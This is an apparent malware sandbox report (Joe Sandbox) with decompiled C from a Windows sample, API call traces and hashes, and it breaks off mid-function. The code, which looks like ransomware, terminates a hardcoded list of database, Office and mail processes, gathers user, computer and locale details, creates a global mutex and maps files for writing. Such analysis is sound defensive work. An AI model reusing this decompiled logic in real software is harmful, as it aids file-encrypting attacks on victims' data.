                                    				int _t52;
                                    				int _t53;
                                    				void* _t60;
                                    				WCHAR* _t62;
                                    				void* _t65;
                                    				void* _t70;
                                    				signed int _t71;
                                    				void* _t72;
                                    				signed int _t74;
                                    				void* _t76;
                                    
                                    				_t76 = (_t74 & 0xfffffff8) - 0xa4;
                                    				_v164 = L"msftesql.exe";
                                    				_v160 = L"sqlagent.exe";
                                    				_v156 = L"sqlbrowser.exe";
                                    				_v152 = L"sqlservr.exe";
                                    				_v148 = L"sqlwriter.exe";
                                    				_v144 = L"oracle.exe";
                                    				_v140 = L"ocssd.exe";
                                    				_v136 = L"dbsnmp.exe";
                                    				_v132 = L"synctime.exe";
                                    				_v128 = L"mydesktopqos.exe";
                                    				_v124 = L"agntsvc.exeisqlplussvc.exe";
                                    				_v120 = L"xfssvccon.exe";
                                    				_v116 = L"mydesktopservice.exe";
                                    				_v112 = L"ocautoupds.exe";
                                    				_v108 = L"agntsvc.exeagntsvc.exe";
                                    				_v104 = L"agntsvc.exeencsvc.exe";
                                    				_v100 = L"firefoxconfig.exe";
                                    				_v96 = L"tbirdconfig.exe";
                                    				_v92 = L"ocomm.exe";
                                    				_v88 = L"mysqld.exe";
                                    				_v84 = L"mysqld-nt.exe";
                                    				_v80 = L"mysqld-opt.exe";
                                    				_v76 = L"dbeng50.exe";
                                    				_v72 = L"sqbcoreservice.exe";
                                    				_v68 = L"excel.exe";
                                    				_v64 = L"infopath.exe";
                                    				_v60 = L"msaccess.exe";
                                    				_v56 = L"mspub.exe";
                                    				_v52 = L"onenote.exe";
                                    				_v48 = L"outlook.exe";
                                    				_v44 = L"powerpnt.exe";
                                    				_v40 = L"steam.exe";
                                    				_v36 = L"sqlservr.exe";
                                    				_v32 = L"thebat.exe";
                                    				_v28 = L"thebat64.exe";
                                    				_v24 = L"thunderbird.exe";
                                    				_v20 = L"visio.exe";
                                    				_v16 = L"winword.exe";
                                    				_v12 = L"wordpad.exe";
                                    				_t49 = CreateToolhelp32Snapshot(2, 0); // executed
                                    				_t70 = _t49;
                                    				_v172 = _t70;
                                    				_t50 = VirtualAlloc(0, 0x22c, 0x3000, 4); // executed
                                    				_t60 = _t50;
                                    				if(_t60 != 0) {
                                    					 *_t60 = 0x22c;
                                    					if(_t70 != 0xffffffff) {
                                    						_push(_t60);
                                    						Process32FirstW(_t70); // executed
                                    					}
                                    				}
                                    				_t41 = _t60 + 0x24; // 0x24
                                    				_t62 = _t41;
                                    				do {
                                    					_t71 = 0;
                                    					do {
                                    						_t51 = lstrcmpiW( *(_t76 + 0x14 + _t71 * 4), _t62);
                                    						if(_t51 == 0) {
                                    							_t65 = OpenProcess(1, _t51,  *(_t60 + 8));
                                    							if(_t65 != 0) {
                                    								TerminateProcess(_t65, 0);
                                    								CloseHandle(_t65);
                                    							}
                                    						}
                                    						_t71 = _t71 + 1;
                                    						_t46 = _t60 + 0x24; // 0x24
                                    						_t62 = _t46;
                                    					} while (_t71 < 0x27);
                                    					_t72 = _v172;
                                    					_t52 = Process32NextW(_t72, _t60);
                                    					_t48 = _t60 + 0x24; // 0x24
                                    					_t62 = _t48;
                                    				} while (_t52 != 0);
                                    				if(_t60 != 0) {
                                    					VirtualFree(_t60, 0, 0x8000); // executed
                                    				}
                                    				_t53 = FindCloseChangeNotification(_t72); // executed
                                    				return _t53;
                                    			}
























































                                    0x0f1448c6
                                    0x0f1448d3
                                    0x0f1448db
                                    0x0f1448e3
                                    0x0f1448eb
                                    0x0f1448f3
                                    0x0f1448fb
                                    0x0f144903
                                    0x0f14490b
                                    0x0f144913
                                    0x0f14491b
                                    0x0f144923
                                    0x0f14492b
                                    0x0f144933
                                    0x0f14493b
                                    0x0f144943
                                    0x0f14494b
                                    0x0f144953
                                    0x0f14495b
                                    0x0f144963
                                    0x0f14496b
                                    0x0f144973
                                    0x0f14497b
                                    0x0f144983
                                    0x0f14498b
                                    0x0f144993
                                    0x0f14499b
                                    0x0f1449a3
                                    0x0f1449ae
                                    0x0f1449b9
                                    0x0f1449c4
                                    0x0f1449cf
                                    0x0f1449da
                                    0x0f1449e5
                                    0x0f1449f0
                                    0x0f1449fb
                                    0x0f144a06
                                    0x0f144a11
                                    0x0f144a1c
                                    0x0f144a27
                                    0x0f144a32
                                    0x0f144a44
                                    0x0f144a48
                                    0x0f144a4c
                                    0x0f144a52
                                    0x0f144a56
                                    0x0f144a58
                                    0x0f144a61
                                    0x0f144a63
                                    0x0f144a65
                                    0x0f144a65
                                    0x0f144a61
                                    0x0f144a71
                                    0x0f144a71
                                    0x0f144a74
                                    0x0f144a74
                                    0x0f144a80
                                    0x0f144a85
                                    0x0f144a8d
                                    0x0f144a9b
                                    0x0f144a9f
                                    0x0f144aa4
                                    0x0f144ab1
                                    0x0f144ab1
                                    0x0f144a9f
                                    0x0f144abb
                                    0x0f144abc
                                    0x0f144abc
                                    0x0f144abf
                                    0x0f144ac4
                                    0x0f144aca
                                    0x0f144ad0
                                    0x0f144ad0
                                    0x0f144ad3
                                    0x0f144ad9
                                    0x0f144ae3
                                    0x0f144ae3
                                    0x0f144aea
                                    0x0f144af2

                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0F144A32
                                    • VirtualAlloc.KERNEL32(00000000,0000022C,00003000,00000004), ref: 0F144A4C
                                    • Process32FirstW.KERNEL32(00000000,00000000), ref: 0F144A65
                                    • lstrcmpiW.KERNEL32(00000002,00000024), ref: 0F144A85
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0F144A95
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0F144AA4
                                    • CloseHandle.KERNEL32(00000000), ref: 0F144AB1
                                    • Process32NextW.KERNEL32(?,00000000), ref: 0F144ACA
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F144AE3
                                    • FindCloseChangeNotification.KERNEL32(?), ref: 0F144AEA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseProcessProcess32Virtual$AllocChangeCreateFindFirstFreeHandleNextNotificationOpenSnapshotTerminateToolhelp32lstrcmpi
                                    • String ID: i)w
                                    • API String ID: 3023235786-1280834553
                                    • Opcode ID: 59c314e766b8a44cb9f17b7a4026036a6a665e31ca343524f8f0a1154e62c182
                                    • Instruction ID: 7464e5c6e66af168a0f9a912ea23405ef477e7dcbad88357fc1bca475e12e2e1
                                    • Opcode Fuzzy Hash: 59c314e766b8a44cb9f17b7a4026036a6a665e31ca343524f8f0a1154e62c182
                                    • Instruction Fuzzy Hash: 05513AB91483819FD320CF11964874BBBE4AFC1719F61490CE9996B352C774B82ECF9A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 0F143BC0: GetProcessHeap.KERNEL32(?,?,0F144807,00000000,?,00000000,00000000), ref: 0F143C5C
                                      • Part of subcall function 0F147490: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F1474B7
                                      • Part of subcall function 0F147490: GetUserNameW.ADVAPI32(00000000,?), ref: 0F1474C8
                                      • Part of subcall function 0F147490: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F1474E6
                                      • Part of subcall function 0F147490: GetComputerNameW.KERNEL32 ref: 0F1474F0
                                      • Part of subcall function 0F147490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F147510
                                      • Part of subcall function 0F147490: wsprintfW.USER32 ref: 0F147551
                                      • Part of subcall function 0F147490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F14756E
                                      • Part of subcall function 0F147490: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F147592
                                      • Part of subcall function 0F147490: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0F144810,?), ref: 0F1475B6
                                      • Part of subcall function 0F147490: RegCloseKey.KERNEL32(00000000), ref: 0F1475D2
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1472F2
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1472FD
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147313
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F14731E
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147334
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F14733F
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147355
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(0F144B36,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147360
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147376
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147381
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F147397
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1473A2
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1473C1
                                      • Part of subcall function 0F1472A0: lstrlenW.KERNEL32(?,?,?,?,0F144819,00000000,?,00000000,00000000,?,00000000), ref: 0F1473CC
                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F14482C
                                    • lstrcpyW.KERNEL32 ref: 0F14484F
                                    • lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F144856
                                    • CreateMutexW.KERNEL32(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F14486E
                                    • GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F14487A
                                    • GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F144881
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F14489B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$Virtual$Alloc$ErrorLastName$CloseComputerCreateFreeHeapMutexOpenProcessQueryUserValuelstrcpywsprintf
                                    • String ID: Global\
                                    • API String ID: 3131499543-188423391
                                    • Opcode ID: e6f87d386d95abd582d3c784e4526ea7316f7441f9f82ad86753c58c55856784
                                    • Instruction ID: 8fb27086326ab75ee5aff3720d904a63a1604bf5d08a4bb6e84bcd3fdfd31531
                                    • Opcode Fuzzy Hash: e6f87d386d95abd582d3c784e4526ea7316f7441f9f82ad86753c58c55856784
                                    • Instruction Fuzzy Hash: 9C21F3716903126BF224EBA4DC4AF7F7A5CDFC0B11F510628FA05A70C1AB98792886E5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0F144A78(void* __ebx, WCHAR* __ecx, void* __esi, void* __ebp, void* _a12) {
                                    				int _t8;
                                    				int _t9;
                                    				int _t10;
                                    				void* _t15;
                                    				WCHAR* _t17;
                                    				void* _t18;
                                    				signed int _t23;
                                    				void* _t24;
                                    				void* _t28;
                                    
                                    				_t17 = __ecx;
                                    				_t15 = __ebx;
                                    				while(1) {
                                    					L2:
                                    					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
                                    					if(_t8 == 0) {
                                    						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
                                    						if(_t18 != 0) {
                                    							TerminateProcess(_t18, 0);
                                    							CloseHandle(_t18);
                                    						}
                                    					}
                                    					_t23 = _t23 + 1;
                                    					_t5 = _t15 + 0x24; // 0x24
                                    					_t17 = _t5;
                                    					if(_t23 < 0x27) {
                                    						continue;
                                    					}
                                    					L7:
                                    					_t24 = _a12;
                                    					_t9 = Process32NextW(_t24, _t15);
                                    					_t7 = _t15 + 0x24; // 0x24
                                    					_t17 = _t7;
                                    					if(_t9 != 0) {
                                    						_t23 = 0;
                                    						do {
                                    							goto L2;
                                    						} while (_t23 < 0x27);
                                    						goto L7;
                                    					}
                                    					if(_t15 != 0) {
                                    						VirtualFree(_t15, 0, 0x8000); // executed
                                    					}
                                    					_t10 = FindCloseChangeNotification(_t24); // executed
                                    					return _t10;
                                    					L2:
                                    					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
                                    					if(_t8 == 0) {
                                    						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
                                    						if(_t18 != 0) {
                                    							TerminateProcess(_t18, 0);
                                    							CloseHandle(_t18);
                                    						}
                                    					}
                                    					_t23 = _t23 + 1;
                                    					_t5 = _t15 + 0x24; // 0x24
                                    					_t17 = _t5;
                                    				}
                                    			}












                                    0x0f144a78
                                    0x0f144a78
                                    0x0f144a80
                                    0x0f144a80
                                    0x0f144a85
                                    0x0f144a8d
                                    0x0f144a9b
                                    0x0f144a9f
                                    0x0f144aa4
                                    0x0f144ab1
                                    0x0f144ab1
                                    0x0f144a9f
                                    0x0f144abb
                                    0x0f144abc
                                    0x0f144abc
                                    0x0f144ac2
                                    0x00000000
                                    0x00000000
                                    0x0f144ac4
                                    0x0f144ac4
                                    0x0f144aca
                                    0x0f144ad0
                                    0x0f144ad0
                                    0x0f144ad5
                                    0x0f144a74
                                    0x0f144a80
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f144a80
                                    0x0f144ad9
                                    0x0f144ae3
                                    0x0f144ae3
                                    0x0f144aea
                                    0x0f144af2
                                    0x0f144a80
                                    0x0f144a85
                                    0x0f144a8d
                                    0x0f144a9b
                                    0x0f144a9f
                                    0x0f144aa4
                                    0x0f144ab1
                                    0x0f144ab1
                                    0x0f144a9f
                                    0x0f144abb
                                    0x0f144abc
                                    0x0f144abc
                                    0x0f144abf

                                    APIs
                                    • lstrcmpiW.KERNEL32(00000002,00000024), ref: 0F144A85
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0F144A95
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0F144AA4
                                    • CloseHandle.KERNEL32(00000000), ref: 0F144AB1
                                    • Process32NextW.KERNEL32(?,00000000), ref: 0F144ACA
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F144AE3
                                    • FindCloseChangeNotification.KERNEL32(?), ref: 0F144AEA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseProcess$ChangeFindFreeHandleNextNotificationOpenProcess32TerminateVirtuallstrcmpi
                                    • String ID: i)w
                                    • API String ID: 3573210778-1280834553
                                    • Opcode ID: a6e02bf0f2f0aea231b629aea495adb3a51d3c7095f9939c29f2206f92affe3a
                                    • Instruction ID: 6f9c6774449a21f788685744765d815a7277baa63ac25cfc1100295587a8367c
                                    • Opcode Fuzzy Hash: a6e02bf0f2f0aea231b629aea495adb3a51d3c7095f9939c29f2206f92affe3a
                                    • Instruction Fuzzy Hash: 4001DB76280201ABD7209F50AC45B5A736CEFC4712F324014FE0B97041D725B8688BB5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0F1435C0(intOrPtr __ecx, intOrPtr __edx) {
                                    				long _v8;
                                    				long _v12;
                                    				intOrPtr _v16;
                                    				intOrPtr _v20;
                                    				long _v24;
                                    				void* _t12;
                                    				void* _t14;
                                    				long _t17;
                                    				void* _t18;
                                    				int _t21;
                                    				void* _t25;
                                    				char* _t29;
                                    				void* _t37;
                                    				void* _t39;
                                    
                                    				_v16 = __edx;
                                    				_v20 = __ecx;
                                    				_v12 = 0;
                                    				_t12 = VirtualAlloc(0, 0xa00, 0x3000, 4); // executed
                                    				_t39 = _t12;
                                    				if(_t39 != 0) {
                                    					GetModuleFileNameW(0, _t39, 0x100);
                                    					_t14 = CreateFileW(_t39, 0x80000000, 1, 0, 3, 0, 0); // executed
                                    					_t37 = _t14;
                                    					if(_t37 != 0xffffffff) {
                                    						_t17 = GetFileSize(_t37, 0);
                                    						_v8 = _t17;
                                    						_t18 = VirtualAlloc(0, _t17, 0x3000, 4); // executed
                                    						_t25 = _t18;
                                    						if(_t25 != 0) {
                                    							_t21 = ReadFile(_t37, _t25, _v8,  &_v24, 0); // executed
                                    							if(_t21 != 0) {
                                    								_t29 = _v8 - 1 + _t25;
                                    								if( *_t29 != 0) {
                                    									do {
                                    										_t29 = _t29 - 1;
                                    									} while ( *_t29 != 0);
                                    									E0F1434F0(_t29 + 1, _v20, _v16);
                                    									_t32 =  !=  ? 1 : 0;
                                    									_v12 =  !=  ? 1 : 0;
                                    								}
                                    							}
                                    							VirtualFree(_t25, 0, 0x8000); // executed
                                    						}
                                    						FindCloseChangeNotification(_t37); // executed
                                    					}
                                    					VirtualFree(_t39, 0, 0x8000); // executed
                                    					return _v12;
                                    				} else {
                                    					return _t12;
                                    				}
                                    			}

















                                    0x0f1435dc
                                    0x0f1435df
                                    0x0f1435e2
                                    0x0f1435e9
                                    0x0f1435eb
                                    0x0f1435ef
                                    0x0f143600
                                    0x0f143616
                                    0x0f14361c
                                    0x0f143621
                                    0x0f143626
                                    0x0f143636
                                    0x0f143639
                                    0x0f14363b
                                    0x0f14363f
                                    0x0f14364c
                                    0x0f143654
                                    0x0f14365a
                                    0x0f14365f
                                    0x0f143661
                                    0x0f143661
                                    0x0f143662
                                    0x0f14366e
                                    0x0f14367f
                                    0x0f143682
                                    0x0f143682
                                    0x0f14365f
                                    0x0f14368d
                                    0x0f14368d
                                    0x0f143694
                                    0x0f143694
                                    0x0f1436a2
                                    0x0f1436b1
                                    0x0f1435f6
                                    0x0f1435f6
                                    0x0f1435f6

                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,00000A00,00003000,00000004,?,77296980), ref: 0F1435E9
                                    • GetModuleFileNameW.KERNEL32(00000000,00000000,00000100,772D82B0), ref: 0F143600
                                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0F143616
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0F143626
                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0F143639
                                    • ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0F14364C
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F14368D
                                    • FindCloseChangeNotification.KERNEL32(00000000), ref: 0F143694
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F1436A2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileVirtual$AllocFree$ChangeCloseCreateFindModuleNameNotificationReadSize
                                    • String ID:
                                    • API String ID: 511603811-0
                                    • Opcode ID: 82a8c1a5d675a393c972a24e725b50c6be56eca9b650cd689346420a0b3cb219
                                    • Instruction ID: b44cf90f1dc54a91c886ea279b680b75f79e6427601ad6177da7e3a17bb44e6e
                                    • Opcode Fuzzy Hash: 82a8c1a5d675a393c972a24e725b50c6be56eca9b650cd689346420a0b3cb219
                                    • Instruction Fuzzy Hash: 32210B717C03047BF7255FA49C86FAE7B68EF84B21F200058FB05AA2C1C7B8B5549B54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0F147D70(intOrPtr* __ecx) {
                                    				int _t20;
                                    				intOrPtr* _t24;
                                    
                                    				_t24 = __ecx;
                                    				if( *__ecx != 0) {
                                    					_t20 = VirtualFree( *(__ecx + 8), 0, 0x8000);
                                    				}
                                    				if( *((intOrPtr*)(_t24 + 0xc)) != 0) {
                                    					_t20 = VirtualFree( *(_t24 + 0x14), 0, 0x8000);
                                    				}
                                    				if( *((intOrPtr*)(_t24 + 0x18)) != 0) {
                                    					_t20 = VirtualFree( *(_t24 + 0x20), 0, 0x8000); // executed
                                    				}
                                    				if( *((intOrPtr*)(_t24 + 0x30)) != 0) {
                                    					_t20 = VirtualFree( *(_t24 + 0x38), 0, 0x8000);
                                    				}
                                    				if( *((intOrPtr*)(_t24 + 0x3c)) != 0) {
                                    					_t20 = VirtualFree( *(_t24 + 0x44), 0, 0x8000);
                                    				}
                                    				if( *((intOrPtr*)(_t24 + 0x48)) != 0) {
                                    					_t20 = VirtualFree( *(_t24 + 0x50), 0, 0x8000);
                                    				}
                                    				if( *((intOrPtr*)(_t24 + 0x54)) != 0) {
                                    					_t20 = VirtualFree( *(_t24 + 0x5c), 0, 0x8000);
                                    				}
                                    				if( *((intOrPtr*)(_t24 + 0x24)) != 0) {
                                    					_t20 = VirtualFree( *(_t24 + 0x2c), 0, 0x8000);
                                    				}
                                    				if( *((intOrPtr*)(_t24 + 0x60)) != 0) {
                                    					_t20 = VirtualFree( *(_t24 + 0x68), 0, 0x8000); // executed
                                    				}
                                    				if( *((intOrPtr*)(_t24 + 0x80)) != 0) {
                                    					return VirtualFree( *(_t24 + 0x84), 0, 0x8000);
                                    				}
                                    				return _t20;
                                    			}





                                    0x0f147d71
                                    0x0f147d7d
                                    0x0f147d89
                                    0x0f147d89
                                    0x0f147d8f
                                    0x0f147d9b
                                    0x0f147d9b
                                    0x0f147da1
                                    0x0f147dad
                                    0x0f147dad
                                    0x0f147db3
                                    0x0f147dbf
                                    0x0f147dbf
                                    0x0f147dc5
                                    0x0f147dd1
                                    0x0f147dd1
                                    0x0f147dd7
                                    0x0f147de3
                                    0x0f147de3
                                    0x0f147de9
                                    0x0f147df5
                                    0x0f147df5
                                    0x0f147dfb
                                    0x0f147e07
                                    0x0f147e07
                                    0x0f147e0d
                                    0x0f147e19
                                    0x0f147e19
                                    0x0f147e22
                                    0x00000000
                                    0x0f147e31
                                    0x0f147e35

                                    APIs
                                    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F1448AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F147D89
                                    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F1448AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F147D9B
                                    • VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0F1448AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F147DAD
                                    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F1448AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F147DBF
                                    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F1448AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F147DD1
                                    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F1448AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F147DE3
                                    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F1448AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F147DF5
                                    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F1448AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F147E07
                                    • VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0F1448AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F147E19
                                    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F1448AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F147E31
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-0
                                    • Opcode ID: 8d313d8531f044a373805cd513ba72fd78230d885c9af78f22c47c9354b96bd2
                                    • Instruction ID: fc5059583083840acdb2271d1f8a8f47d5973acb692bbed11403a5298bd8ed88
                                    • Opcode Fuzzy Hash: 8d313d8531f044a373805cd513ba72fd78230d885c9af78f22c47c9354b96bd2
                                    • Instruction Fuzzy Hash: 2721C430290B04AAE7765A15DC06FA676E1BF80B45F65493CF2C1344F18BF57499EF44
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 86%
                                    			E0F142890(WCHAR* __ecx, intOrPtr __edx) {
                                    				long _v8;
                                    				intOrPtr _v12;
                                    				void* _v16;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* _t9;
                                    				signed int _t14;
                                    				void* _t18;
                                    				void* _t19;
                                    				void* _t23;
                                    				struct _SECURITY_ATTRIBUTES* _t24;
                                    				WCHAR* _t29;
                                    				void* _t34;
                                    				signed int _t35;
                                    				long _t37;
                                    				void* _t38;
                                    				void* _t40;
                                    
                                    				_t29 = __ecx;
                                    				_t28 = 0;
                                    				_v12 = __edx;
                                    				_t9 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0); // executed
                                    				_t34 = _t9;
                                    				if(_t34 == 0xffffffff) {
                                    					L3:
                                    					return 0;
                                    				} else {
                                    					_v8 = GetFileSize(_t34, 0);
                                    					E0F143030(0, _t34, _t35); // executed
                                    					asm("sbb esi, esi");
                                    					_t37 = (_t35 & 0x00000003) + 1;
                                    					_t14 = E0F143030(0, _t34, _t37);
                                    					asm("sbb eax, eax");
                                    					_t18 = CreateFileMappingW(_t34, 0, ( ~_t14 & 0xfffffffa) + 8, 0, 0, 0); // executed
                                    					_v16 = _t18;
                                    					if(_t18 != 0) {
                                    						_t19 = MapViewOfFile(_t18, _t37, 0, 0, 0); // executed
                                    						_t38 = _t19;
                                    						if(_t38 != 0) {
                                    							_t23 = E0F143030(0, _t34, _t38); // executed
                                    							if(_t23 == 0) {
                                    								_push(_t29);
                                    								_t4 = _t38 + 0x53; // 0x53
